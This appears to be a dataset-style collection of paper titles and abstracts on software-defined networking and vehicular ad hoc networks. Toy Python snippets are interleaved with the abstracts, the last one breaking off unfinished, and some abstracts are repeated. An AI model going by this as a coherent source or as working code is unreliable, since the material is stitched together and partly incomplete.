--- paper_title: Maturing of OpenFlow and Software Defined Networking through Deployments paper_content: Software-defined Networking (SDN) has emerged as a new paradigm of networking that enables network operators, owners, vendors, and even third parties to innovate and create new capabilities at a faster pace. The SDN paradigm shows potential for all domains of use, including data centers, cellular providers, service providers, enterprises, and homes. Over a three-year period, we deployed SDN technology at our campus and at several other campuses nation-wide with the help of partners. These deployments included the first-ever SDN prototype in a lab for a (small) global deployment. The four-phased deployments and demonstration of new networking capabilities enabled by SDN played an important role in maturing SDN and its ecosystem. We share our experiences and lessons learned that have to do with demonstration of SDN's potential; its influence on successive versions of OpenFlow specification; evolution of SDN architecture; performance of SDN and various components; and growing the ecosystem. --- paper_title: Vehicle Ad Hoc networks: applications and related technical issues paper_content: This article presents a comprehensive survey of the state-of-the-art for vehicle ad hoc networks. We start by reviewing the possible applications that can be used in VANETs, namely, safety and user applications, and by identifying their requirements. Then, we classify the solutions proposed in the literature according to their location in the open system interconnection reference model and their relationship to safety or user applications. We analyze their advantages and shortcomings and provide our suggestions for a better approach. We also describe the different methods used to simulate and evaluate the proposed solutions. Finally, we conclude with suggestions for a general architecture that can form the basis for a practical VANET. --- paper_title: Software-Defined Networking for Internet of Things: A Survey paper_content: Internet of things (IoT) facilitates billions of devices to be enabled with network connectivity to collect and exchange real-time information for providing intelligent services. Thus, IoT allows connected devices to be controlled and accessed remotely in the presence of adequate network infrastructure. Unfortunately, traditional network technologies such as enterprise networks and classic timeout-based transport protocols are not capable of handling such requirements of IoT in an efficient, scalable, seamless, and cost-effective manner. Besides, the advent of software-defined networking (SDN) introduces features that allow the network operators and users to control and access the network devices remotely, while leveraging the global view of the network. In this respect, we provide a comprehensive survey of different SDN-based technologies, which are useful to fulfill the requirements of IoT, from different networking aspects— edge , access , core , and data center networking. In these areas, the utility of SDN-based technologies is discussed, while presenting different challenges and requirements of the same in the context of IoT applications. We present a synthesized overview of the current state of IoT development. We also highlight some of the future research directions and open research issues based on the limitations of the existing SDN-based technologies. 
--- paper_title: CloudMAC: towards software defined WLANs
paper_content: Traditional enterprise WLAN management systems are hard to extend and require powerful access points (APs). In this paper we introduce and evaluate CloudMAC, an architecture for enterprise WLANs in which MAC frames are generated and processed on virtual APs hosted in a datacenter. The APs only need to forward MAC frames. The APs and the servers are connected via an OpenFlow-enabled network, which allows control over where and how MAC frames are transmitted.
--- paper_title: Advertising in the IoT Era: Vision and Challenges
paper_content: The IoT extends the idea of interconnecting computers to a plethora of different devices, collectively referred to as smart devices. These are physical items, that is, "things", such as wearable devices, home appliances, and vehicles, enriched with computational and networking capabilities. Due to the huge set of devices involved, and therefore its pervasiveness, IoT is a great platform to leverage for building new applications and services or extending existing ones. In this regard, expanding online advertising into the IoT realm is an under-investigated yet promising research direction, especially considering that the traditional Internet advertising market is already worth hundreds of billions of dollars. In this article, we first propose the architecture of an IoT advertising platform inspired by the well known business ecosystem, which the traditional Internet advertising is based on. Additionally, we discuss the key challenges to implement such a platform, with a special focus on issues related to architecture, advertisement content delivery, security, and privacy of the users.
--- paper_title: OpenRoads: empowering research in mobile networks
paper_content: We present OpenRoads, an open-source platform for innovation in mobile networks. OpenRoads enables researchers to innovate using their own production networks, by providing a wireless extension of OpenFlow. Therefore, you can think of OpenRoads as "OpenFlow Wireless". The OpenRoads architecture consists of three layers: flow, slicing and controller. These layers provide flexible control, virtualization and high-level abstraction. This allows researchers to implement wildly different algorithms and run them concurrently in one network. OpenRoads also incorporates multiple wireless technologies, specifically WiFi and WiMAX. We have deployed OpenRoads, and used it as our production network. Our goal here is for others to deploy OpenRoads and build their own experiments on it.
--- paper_title: Vehicle Ad Hoc networks: applications and related technical issues
paper_content: This article presents a comprehensive survey of the state-of-the-art for vehicle ad hoc networks. We start by reviewing the possible applications that can be used in VANETs, namely, safety and user applications, and by identifying their requirements. Then, we classify the solutions proposed in the literature according to their location in the open system interconnection reference model and their relationship to safety or user applications. We analyze their advantages and shortcomings and provide our suggestions for a better approach. We also describe the different methods used to simulate and evaluate the proposed solutions. Finally, we conclude with suggestions for a general architecture that can form the basis for a practical VANET.
--- paper_title: Security challenges in vehicular cloud computing
paper_content: In a series of recent papers, Prof.
Olariu and his co-workers have promoted the vision of vehicular clouds (VCs), a nontrivial extension, along several dimensions, of conventional cloud computing. In a VC, underutilized vehicular resources including computing power, storage, and Internet connectivity can be shared between drivers or rented out over the Internet to various customers. Clearly, if the VC concept is to see a wide adoption and to have significant societal impact, security and privacy issues need to be addressed. The main contribution of this work is to identify and analyze a number of security challenges and potential privacy threats in VCs. Although security issues have received attention in cloud computing and vehicular networks, we identify security challenges that are specific to VCs, e.g., challenges of authentication of high-mobility vehicles, scalability and single interface, tangled identities and locations, and the complexity of establishing trust relationships among multiple players caused by intermittent short-range communications. Additionally, we provide a security scheme that addresses several of the challenges discussed. --- paper_title: 1 Communication Patterns in VANETs paper_content: Vehicular networks are a very promising technology to increase traffic safety and efficiency, and to enable numerous other applications in the domain of vehicular communication. Proposed applications for VANETs have very diverse properties and often require nonstandard communication protocols. Moreover, the dynamics of the network due to vehicle movement further complicates the design of an appropriate comprehensive communication system. In this article we collect and categorize envisioned applications from various sources and classify the unique network characteristics of vehicular networks. Based on this analysis, we propose five distinct communication patterns that form the basis of almost all VANET applications. Both the analysis and the communication patterns shall deepen the understanding of VANETs and simplify further development of VANET communication systems. --- paper_title: Fast and Secure Multihop Broadcast Solutions for Intervehicular Communication paper_content: Intervehicular communication (IVC) is an important emerging research area that is expected to considerably contribute to traffic safety and efficiency. In this context, many possible IVC applications share the common need for fast multihop message propagation, including information such as position, direction, and speed. However, it is crucial for such a data exchange system to be resilient to security attacks. Conversely, a malicious vehicle might inject incorrect information into the intervehicle wireless links, leading to life and money losses or to any other sort of adversarial selfishness (e.g., traffic redirection for the adversarial benefit). In this paper, we analyze attacks to the state-of-the-art IVC-based safety applications. Furthermore, this analysis leads us to design a fast and secure multihop broadcast algorithm for vehicular communication, which is proved to be resilient to the aforementioned attacks. --- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. 
However, current VANET architectures lack in flexibility and make the deployment of services/protocols in large-scale a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide the flexibility and programmability to networks and introduces new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: The position cheating attack on inter-vehicular online gaming paper_content: New in-car communications and entertainment systems have emerged, enabling interconnection of various components in vehicles (e.g., TVs, CD/DVD players, media players, and cell phones). With the new advances of automotive industry, car passengers embody the next consumers that will be targeted by online game providers. In this context, researchers on online games demonstrated the importance of the network's performance in determining the quality level perceived by consumers. Enabling games over Vehicular Ad hoc Networks (VANET) will require the design of secure architectures against threats, in order to not jeopardize the effectiveness of online gaming over VANET. These threats could increase the delivery delay of game events, leading to the unsatisfaction of passengers. In this paper, we address security threats for online gaming over VANET. In particular, we focus on a representative vehicular broadcast algorithm, and we discuss a cheating threat. Indeed, the attacker could use the location-aware game message exchange to cheat about his position, thus enforcing game events to be delayed, and reduce the quality of service. Finally, we run a thorough set of simulations to assess the impact of the position cheating attack to the online gaming over VANET. --- paper_title: Vehicle Software Updates Distribution with SDN and Cloud Computing paper_content: Vehicles have embedded software dedicated to diverse functionality ranging from driving assistance to entertainment. Vehicle manufacturers often need to perform updates on software installed on vehicles. Software updates can either be pushed by the manufacturer to install fixes, or be requested by vehicle owners to upgrade some functionality. We propose an architecture for distributing software updates on vehicles based on SDN and cloud computing. We show that using SDN, the emergent networking paradigm, which provides on-demand network programmability, adds substantial flexibility for deploying software updates on vehicles. We propose solutions for how vehicular networks can be modeled as connectivity graphs that can be used as input for the SDN architecture. After constructing graphs, we present an SDN-based solution where different frequency bands are assigned to different graph edges to improve the network performance. 
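The software-update entry above models the vehicular network as a connectivity graph and assigns different frequency bands to different graph edges. The toy sketch below builds such a graph from vehicle positions and greedily assigns bands so that links sharing a vehicle avoid the same band; the communication range, channel names, and positions are illustrative assumptions rather than values from the cited work.

# Toy connectivity graph and greedy per-link band assignment (illustrative only).
from itertools import combinations

def connectivity_graph(positions, comm_range=300.0):
    """positions: {vehicle_id: (x, y)}; an edge exists if two vehicles are within range."""
    edges = []
    for (a, pa), (b, pb) in combinations(positions.items(), 2):
        if ((pa[0] - pb[0]) ** 2 + (pa[1] - pb[1]) ** 2) ** 0.5 <= comm_range:
            edges.append((a, b))
    return edges

def assign_bands(edges, bands=('ch172', 'ch174', 'ch176')):
    """Greedy edge colouring: avoid reusing a band on links that share a vehicle."""
    assignment = {}
    for edge in edges:
        used = {band for other, band in assignment.items() if set(other) & set(edge)}
        free = [b for b in bands if b not in used]
        assignment[edge] = free[0] if free else bands[0]   # fall back if bands run out
    return assignment

positions = {'v1': (0, 0), 'v2': (100, 50), 'v3': (220, 60), 'v4': (900, 0)}
print(assign_bands(connectivity_graph(positions)))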
--- paper_title: SDVN: enabling rapid network innovation for heterogeneous vehicular communication paper_content: With the advances in telecommunications, more and more devices are connected to the Internet and getting smart. As a promising application scenario for carrier networks, vehicular communication has enabled many traffic-related applications. However, the heterogeneity of wireless infrastructures and the inflexibility in protocol deployment hinder the real world application of vehicular communications. SDN is promising to bridge the gaps through unified network abstraction and programmability. In this research, we propose an SDN-based architecture to enable rapid network innovation for vehicular communications. Under this architecture, heterogeneous wireless devices, including vehicles and roadside units, are abstracted as SDN switches with a unified interface. In addition, network resources such as bandwidth and spectrum can also be allocated and assigned by the logically centralized control plane, which provides a far more agile configuration capability. Besides, we also study several cases to highlight the advantages of the architecture, such as adaptive protocol deployment and multiple tenants isolation. Finally, the feasibility and effectiveness of the proposed architecture and cases are validated through traffic-trace-based simulation. --- paper_title: The impact of malicious nodes positioning on vehicular alert messaging system paper_content: ICT components of vehicular and transportation systems have a crucial role in ensuring passengers' safety, particularly in the scenario of vehicular networks. Hence, security concerns should not be overlooked, since a malicious vehicle might inject false information into the intervehicle wireless links, leading to life and money losses. This is even more critical when considering applications specifically aimed at improving people's safety, such as accident warning systems. To assess the scenario of such type of applications in a vehicular network, we have performed a thorough evaluation of accident warning systems under a position cheating attack. As one of the main contributions of this paper, we determine the impact of a different number of malicious vehicles on delaying the alert warning messages. In particular, we study the impact of the position of malicious vehicles on delaying alert messages. We identify the most effective strategies that could be used by malicious vehicles in order to maximize the delay of the alert message, and thus strengthen the impact of the attacker. Finally, we pinpoint that even with a small number of malicious vehicles, the positioning cheating attack can significantly increase the delay of the alert message when compared to a scenario without attack. --- paper_title: Privacy-Preserving Vehicular Communication Authentication with Hierarchical Aggregation and Fast Response paper_content: Existing secure and privacy-preserving schemes for vehicular communications in vehicular ad hoc networks face some challenges, e.g., reducing the dependence on ideal tamper-proof devices, building efficient member revocation mechanisms and avoiding computation and communication bottlenecks. To cope with those challenges, we propose a highly efficient secure and privacy-preserving scheme based on identity-based aggregate signatures. Our scheme enables hierarchical aggregation and batch verification. The individual identity-based signatures generated by different vehicles can be aggregated and verified in a batch. 
The aggregated signatures can be re-aggregated by a message collector (e.g., traffic management authority). With our hierarchical aggregation technique, we significantly reduce the transmission/storage overhead of the vehicles and other parties. Furthermore, existing batch verification based schemes in vehicular ad hoc networks require vehicles to wait for enough messages to perform a batch verification. In contrast, we assume that vehicles will generate messages (and the corresponding signatures) in certain time spans, so that vehicles only need to wait for a very short period before they can start the batch verification procedure. Simulation shows that a vehicle can verify the received messages with very low latency and fast response. --- paper_title: Performance Evaluation of the IEEE 802.11p WAVE Communication Standard paper_content: In order to provide Dedicated Short Range Communication (DSRC) for future vehicle-to-vehicle (V2V) communication the IEEE is currently working on the IEEE 802.11p Wireless Access in Vehicular Environments (WAVE) standard. The standard shall provide a multi-channel DSRC solution with high performance for multiple application types to be used in future Vehicular Ad Hoc Networks (VANETs). We provide a performance evaluation of the standard, considering collision probability, throughput and delay, using simulations and analytical means. WAVE can prioritize messages; however, in dense and high-load scenarios the throughput decreases while the delay increases significantly. --- paper_title: An Intervehicular Communication Architecture for Safety and Entertainment paper_content: Intervehicle communication (IVC) is emerging in research prominence for the interest that it is generating in all major car manufacturers and for the benefits that its inception will produce. The specific features of IVC will allow the deployment of a wide set of possible applications, which span from road safety to entertainment. Even if, on the one hand, these applications share the common need for fast multihop message propagation, on the other hand, they possess distinct characteristics in terms of generated network traffic. The state of the art of current research only proposes solutions specifically designed for a single application (or class) that is not directly extendable to a general IVC context. Instead, we claim that a privileged architecture exists, which is able to support the whole spectrum of application classes. To this aim, we propose a novel IVC architecture that adapts its functionalities to efficiently serve applications by quickly propagating their messages over a vehicular network. We conducted an extensive set of experiments that demonstrate the efficacy of our approach. As representative case studies, we considered two application classes that, for their network traffic characteristics, are at the opposite boundaries of the application spectrum: safety and entertainment. --- paper_title: A Scalable and Quick-Response Software Defined Vehicular Network Assisted by Mobile Edge Computing paper_content: Connected vehicles provide advanced transformations and attractive business opportunities in the automotive industry. Presently, IEEE 802.11p and evolving 5G are the mainstream radio access technologies in the vehicular industry, but neither of them can meet all requirements of vehicle communication.
In order to provide low-latency and high-reliability communication, an SDN-enabled network architecture assisted by MEC, which integrates different types of access technologies, is proposed. MEC technology with its on-premises feature can decrease data transmission time and enhance quality of user experience in latency-sensitive applications. Therefore, MEC plays as important a role in the proposed architecture as SDN technology. The proposed architecture was validated by a practical use case, and the obtained results have shown that it meets application- specific requirements and maintains good scalability and responsiveness. --- paper_title: Intelligent Traffic Light Controlling Algorithms Using Vehicular Networks paper_content: In this paper, we propose an intelligent traffic light controlling (ITLC) algorithm. ITLC is intended to schedule the phases of each isolated traffic light efficiently. This algorithm considers the real-time traffic characteristics of the competing traffic flows at the signalized road intersection. Moreover, we have adopted the ITLC algorithm to design a traffic scheduling algorithm for an arterial street scenario; we have thus proposed an arterial traffic light (ATL) controlling algorithm. In the ATL controlling algorithm, the intelligent traffic lights installed at each road intersection coordinate with each other to generate an efficient traffic schedule for the entire road network. We report on the performance of ITLC and ATL algorithms for several scenarios using NS-2. From the experimental results, we infer that the ITLC algorithm reduces, at each isolated traffic light, the queuing delay and increases the traffic fluency by 30% compared with the online algorithm (OAF) traffic light scheduling algorithm. The latter algorithm achieved the best performance when compared with the OAF traffic light scheduling algorithm. On the other hand, the ATL controlling algorithm increases the traffic fluency of traveling vehicles at arterial street coordinations by 70% more than the random and separate traffic light scheduling system. Furthermore, compared with the previously introduced traffic scheduling ART-SYS, the ATL controlling algorithm decreases the average delay at each traffic light by 10%. --- paper_title: A secure and efficient communication scheme with authenticated key establishment and privacy preserving for vehicular ad hoc networks paper_content: Privacy and security should be paid much more attention in secure vehicular ad hoc networks (VANETs). However, as far as we know, few researches on secure VANET protocols have addressed both the privacy issues and authenticated key establishment. Therefore, in this work, a lightweight authenticated key establishment scheme with privacy preservation to secure the communications between mobile vehicles and roadside infrastructure in a VANET is proposed, which is called SECSPP. Our proposed scheme not only accomplishes vehicle-to-vehicle and vehicle-to-roadside infrastructure authentication and key establishment for communication between members, but also integrates blind signature techniques into the scheme in allowing mobile vehicles to anonymously interact with the services of roadside infrastructure. We also show that our scheme is efficient in its implementation on mobile vehicles in comparison with other related proposals. 
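Several of the entries above describe controllers that schedule shared resources from real-time reports; the ITLC work, for instance, sets traffic-light phases from the measured state of the competing flows at an intersection. The toy sketch below shows one way such queue-driven phase selection could look; the phase grouping, saturation rate, queue values, and green-time bounds are invented for illustration and are not taken from the cited algorithm.

```python
# Illustrative sketch of queue-driven phase scheduling at an isolated intersection.
# Flow names, saturation rate, and green-time bounds are assumptions for demonstration.

SATURATION_RATE = 0.5          # vehicles per second one green phase can discharge
MIN_GREEN, MAX_GREEN = 10, 60  # seconds

# Phases group non-conflicting flows; queue lengths would come from V2I reports.
phases = {
    "north_south": {"N_through": 14, "S_through": 9},
    "east_west":   {"E_through": 4,  "W_through": 6},
    "left_turns":  {"N_left": 2, "S_left": 3, "E_left": 1, "W_left": 0},
}

def schedule_next_phase(phases):
    """Pick the phase with the longest total queue and size its green interval."""
    name, flows = max(phases.items(), key=lambda kv: sum(kv[1].values()))
    queued = sum(flows.values())
    green = min(MAX_GREEN, max(MIN_GREEN, queued / SATURATION_RATE))
    return name, green

if __name__ == "__main__":
    phase, green_s = schedule_next_phase(phases)
    print(f"serve phase '{phase}' for {green_s:.0f} s")
```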
--- paper_title: A Survey on Software-Defined Networking paper_content: Emerging mega-trends (e.g., mobile, social, cloud, and big data) in information and communication technologies (ICT) are commanding new challenges to future Internet, for which ubiquitous accessibility, high bandwidth, and dynamic management are crucial. However, traditional approaches based on manual configuration of proprietary devices are cumbersome and error-prone, and they cannot fully utilize the capability of physical network infrastructure. Recently, software-defined networking (SDN) has been touted as one of the most promising solutions for future Internet. SDN is characterized by its two distinguished features, including decoupling the control plane from the data plane and providing programmability for network application development. As a result, SDN is positioned to provide more efficient configuration, better performance, and higher flexibility to accommodate innovative network designs. This paper surveys latest developments in this active research area of SDN. We first present a generally accepted definition for SDN with the aforementioned two characteristic features and potential benefits of SDN. We then dwell on its three-layer architecture, including an infrastructure layer, a control layer, and an application layer, and substantiate each layer with existing research efforts and its related research areas. We follow that with an overview of the de facto SDN implementation (i.e., OpenFlow). Finally, we conclude this survey paper with some suggested open research challenges. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: A Buffer-Aware QoS Streaming Approach for SDN-Enabled 5G Vehicular Networks paper_content: With the progress of network technology in recent years, multimedia streaming applications have become increasingly popular. However, it is difficult to achieve quality of service and efficiency for multimedia streaming over vehicular networks because of the high mobility feature. Over the existing network architecture, it is difficult to immediately analyze the status of the entire network, and then establish the rules of allocation and management. However, the novel network architecture, software-defined networking, offers other options for making network management more efficient, especially for the 5G network environment. 
Hence, a buffer-aware streaming approach is proposed to allow users to play multimedia streaming over vehicular 5G networks, in the case of handover between different eNodeBs, to achieve minimum delay and have better quality of service. According to the user's mobility information, the status of the player buffer, and the current strength of the network signal, the proposed approach can provide the transmission strategy of multimedia streaming to the SDN controller. Finally, the experimental results proved that the proposed approach is able to not only adjust the priority of streaming content segments with the buffer and mobility status of user equipment to effectively retain overall streaming services quality, but also avoid the delay of streaming content transmission for 5G vehicular networks. --- paper_title: 5G next generation VANETs using SDN and fog computing framework paper_content: The growth of technical revolution towards 5G Next generation networks is expected to meet various communication requirements of future Intelligent Transportation Systems (ITS). Motivated by the consumer needs for variety of ITS applications, bandwidth, high speed and ubiquity, researches are currently exploring different network architectures and techniques, which could be employed in Next generation ITS. To provide flexible network management, control and high resource utilization in Vehicular Ad-hoc Networks (VANETs) on large scale, a new hierarchical 5G Next generation VANET architecture is proposed. The key idea of this holistic architecture is to integrate the centralization and flexibility of Software Defined Networking (SDN) and Cloud-RAN (CRAN), with 5G communication technologies, to effectively allocate resources with a global view. Moreover, a fog computing framework (comprising of zones and clusters) has been proposed at the edge, to avoid frequent handovers between vehicles and RSUs. The transmission delay, throughput and control overhead on controller are analyzed and compared with other architectures. Simulation results indicate reduced transmission delay and minimized control overhead on controllers. Moreover, the throughput of proposed system is also improved. --- paper_title: 5G Software Defined Vehicular Networks paper_content: With the emergence of 5G mobile communication systems and software defined networks, not only could the performance of vehicular networks be improved, but also new applications of vehicular networks are required by future vehicles (e.g., pilotless vehicles). To meet requirements of intelligent transportation systems, a new vehicular network architecture integrated with 5G mobile communication technologies and software defined networking is proposed in this article. Moreover, fog cells have been proposed to flexibly cover vehicles and avoid frequent handover between vehicles and roadside units. Based on the proposed 5G software defined vehicular networks, the transmission delay and throughput are analyzed and compared. Simulation results indicate that there is a minimum transmission delay of 5G software defined vehicular networks considering different vehicle densities. Moreover, the throughput of fog cells in 5G software defined vehicular networks is better than the throughput of traditional transportation management systems. 
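The buffer-aware streaming approach cited above derives its delivery strategy from the player buffer state, the current signal strength, and the mobility of the client. A minimal sketch of that kind of decision rule is given below; the thresholds, priority labels, and report fields are assumptions made for illustration rather than the scheme's actual parameters.

```python
from dataclasses import dataclass

# Thresholds below are illustrative assumptions, not values from the cited work.
BUFFER_LOW_S = 5.0       # playback seconds left before stalling is imminent
RSSI_WEAK_DBM = -85.0    # signal level below which a handover is likely soon

@dataclass
class ClientReport:
    vehicle_id: str
    buffer_seconds: float  # media currently buffered at the player
    rssi_dbm: float        # strength of the serving cell / RSU signal
    speed_mps: float       # rough handover-risk indicator

def segment_priority(report: ClientReport) -> str:
    """Map a client report to a coarse delivery priority for its next segments."""
    if report.buffer_seconds < BUFFER_LOW_S:
        return "urgent"      # about to stall: push segments first
    if report.rssi_dbm < RSSI_WEAK_DBM or report.speed_mps > 25:
        return "prefetch"    # handover likely: fill the buffer while we can
    return "normal"

if __name__ == "__main__":
    reports = [
        ClientReport("car-17", buffer_seconds=2.4, rssi_dbm=-70, speed_mps=18),
        ClientReport("car-42", buffer_seconds=22.0, rssi_dbm=-90, speed_mps=30),
        ClientReport("car-08", buffer_seconds=15.0, rssi_dbm=-65, speed_mps=12),
    ]
    for r in reports:
        print(r.vehicle_id, "->", segment_priority(r))
```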
--- paper_title: An Architecture for Hierarchical Software-Defined Vehicular Networks paper_content: With the recent advances in the telecommunications and auto industries, we have witnessed growing interest in ITS, of which VANETs are an essential component. SDN can bring advantages to ITS through its ability to provide flexibility and programmability to networks through a logically centralized controller entity that has a comprehensive view of the network. However, as the SDN paradigm initially had fixed networks in mind, adapting it to work on VANETs requires some changes to address particular characteristics of this kind of scenario, such as the high mobility of its nodes. There has been initial work on bringing SDN concepts to vehicular networks to expand its abilities to provide applications and services through the increased flexibility, but most of these studies do not directly tackle the issue of loss of connectivity with said controller entity. In this article, we propose a hierarchical SDN-based vehicular architecture that aims to have improved performance in the situation of loss of connection with the central SDN controller. Simulation results show that our proposal outperforms traditional routing protocols in the scenario where there is no coordination from the central SDN controller. --- paper_title: Cooperative Data Scheduling in Hybrid Vehicular Ad Hoc Networks: VANET as a Software Defined Network paper_content: This paper presents the first study on scheduling for cooperative data dissemination in a hybrid infrastructure-to-vehicle (I2V) and vehicle-to-vehicle (V2V) communication environment. We formulate the novel problem of cooperative data scheduling (CDS). Each vehicle informs the road-side unit (RSU) the list of its current neighboring vehicles and the identifiers of the retrieved and newly requested data. The RSU then selects sender and receiver vehicles and corresponding data for V2V communication, while it simultaneously broadcasts a data item to vehicles that are instructed to tune into the I2V channel. The goal is to maximize the number of vehicles that retrieve their requested data. We prove that CDS is NP-hard by constructing a polynomial-time reduction from the Maximum Weighted Independent Set (MWIS) problem. Scheduling decisions are made by transforming CDS to MWIS and using a greedy method to approximately solve MWIS. We build a simulation model based on realistic traffic and communication characteristics and demonstrate the superiority and scalability of the proposed solution. The proposed model and solution, which are based on the centralized scheduler at the RSU, represent the first known vehicular ad hoc network (VANET) implementation of software defined network (SDN) concept. --- paper_title: Delay-Minimization Routing for Heterogeneous VANETs With Machine Learning Based Mobility Prediction paper_content: Establishing and maintaining end-to-end connections in a vehicular ad hoc network (VANET) is challenging due to the high vehicle mobility, dynamic inter-vehicle spacing, and variable vehicle density. Mobility prediction of vehicles can address the aforementioned challenge, since it can provide a better routing planning and improve overall VANET performance in terms of continuous service availability. In this paper, a centralized routing scheme with mobility prediction is proposed for VANET assisted by an artificial intelligence powered software-defined network (SDN) controller. 
Specifically, the SDN controller can perform accurate mobility prediction through an advanced artificial neural network technique. Then, based on the mobility prediction, the successful transmission probability and average delay of each vehicle's request under frequent network topology changes can be estimated by the roadside units (RSUs) or the base station (BS). The estimation is performed based on a stochastic urban traffic model in which the vehicle arrival follows a non-homogeneous Poisson process. The SDN controller gathers network information from RSUs and BS that are considered as the switches. Based on the global network information, the SDN controller computes optimal routing paths for switches (i.e., BS and RSU). While the source vehicle and destination vehicle are located in the coverage area of the same switch, further routing decision will be made by the RSUs or the BS independently to minimize the overall vehicular service delay. The RSUs or the BS schedule the requests of vehicles by either vehicle-to-vehicle or vehicle-to-infrastructure communication, from the source vehicle to the destination vehicle. Simulation results demonstrate that our proposed centralized routing scheme outperforms others in terms of transmission delay, and the transmission performance of our proposed routing scheme is more robust with varying vehicle velocity. --- paper_title: QoE-Based Flow Management in Software Defined Vehicular Networks paper_content: In vehicular networks, high mobility and limited transmission range of Road-Side Units (RSU) cause dynamic topological changes and result with interference occurred by transmission of vehicles. Moreover, due to the limited bandwidth of IEEE 802.11p based vehicular communication, providing a fair share of network resources among vehicles is essential for an efficient network management. Therefore, flow and interference management challenges cause a degradation in percentage of flow satisfied by effecting quality of communication and enhancing interference in vehicular networks. These aforementioned two challenges can be mitigated with Software-Defined Networking (SDN) paradigm where a centralized controller can schedule data flows and then coordinate power level of vehicles. Hence, in this paper, the cooperation of SDN and IEEE 802.11p based vehicular communication has been proposed in vehicular networks. We present a novel software- defined flow and power management model implemented into controller. Here, we classify vehicles based on Quality of Experience (QoE) and model RSUs with a queuing theoretic approach. Then the proposed model is used to detect unsatisfactory vehicles and estimate effective and accurate amount of transmission power of these vehicles so that unsatisfactory vehicles will be served a new assigned RSU with optimal signal level. Moreover, we redefine flow label field in OpenFlow flow table so that controller can manage to RSUs by imposing some behaviors. Numerical results show how a better flow satisfied can be maintained by implementing this idea. --- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. 
However, current VANET architectures lack in flexibility and make the deployment of services/protocols in large-scale a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide the flexibility and programmability to networks and introduces new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: An efficient service channel allocation scheme in SDN-enabled VANETs paper_content: Providing infotainment services in Vehicular Adhoc Networks (VANETs) is a key functionality for the future intelligent transportation systems. However, the unique features of vehicular networks such as high velocity, intermittent communication links and dynamic density can induce severe performances degradation for infotainment services running on the six Service Channels (SCHs) available in the Dedicated Short Range Communication (DSRC). Although, the Wireless Access in the Vehicular Environment (WAVE) has been proposed for VANETs to support these applications and guarantee the QoS by proposing four different access categories, no service channel scheme has been proposed to ensure fair and interference-aware allocation. To fill this gap, in this work we propose ESCiVA, an Efficient Service Channel allocation Scheme in SDN-enabled VAnets to balance service traffic on the six SCHs and mitigate interferences between services provided on adjacent channels. Extensive simulation results confirm that ESCiVA outperforms the basic SCH allocation method, defined in the WAVE standard. --- paper_title: Cost-Efficient Sensory Data Transmission in Heterogeneous Software-Defined Vehicular Networks paper_content: Sensing and networking have been regarded as key enabling technologies of future smart vehicles. Sensing allows vehicles to be context awareness, while networking empowers context sharing among ambients. Existing vehicular communication solutions mainly rely on homogeneous network, or heterogeneous network via data offloading. However, today’s vehicular network implementations are highly heterogeneous. Therefore, conventional homogeneous communication and data offloading may not be able to satisfy the requirement of the emerging vehicular networking applications. In this paper, we apply the software-defined network (SDN) to the heterogeneous vehicular networks to bridge the gaps. With SDN, heterogeneous network resources can be managed with a unified abstraction. Moreover, we propose an SDN-based wireless communication solution, which can schedule different network resources to minimize communication cost. We investigate the problems in both single and multiple hop cases. We also evaluate the proposed approaches using traffic traces. The effectiveness and the efficiency are validated by the results. 
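The cost-efficient sensory-data work above schedules traffic over heterogeneous interfaces so as to minimize communication cost. The snippet below sketches the simplest form of such a per-message decision, picking the cheapest available interface that still meets a delay bound; the interface catalogue, prices, and delay figures are hypothetical values, not numbers from the paper.

```python
# Illustrative catalogue of heterogeneous interfaces; prices and delays are assumptions.
INTERFACES = {
    "dsrc_80211p": {"cost_per_mb": 0.0,  "expected_delay_ms": 40, "available": True},
    "wifi_rsu":    {"cost_per_mb": 0.01, "expected_delay_ms": 60, "available": False},
    "lte":         {"cost_per_mb": 0.25, "expected_delay_ms": 25, "available": True},
}

def cheapest_feasible_interface(size_mb, deadline_ms):
    """Return (name, cost) of the cheapest available interface meeting the deadline."""
    feasible = [
        (spec["cost_per_mb"] * size_mb, name)
        for name, spec in INTERFACES.items()
        if spec["available"] and spec["expected_delay_ms"] <= deadline_ms
    ]
    if not feasible:
        return None  # no interface satisfies the deadline; caller must relax or drop
    cost, name = min(feasible)
    return name, cost

if __name__ == "__main__":
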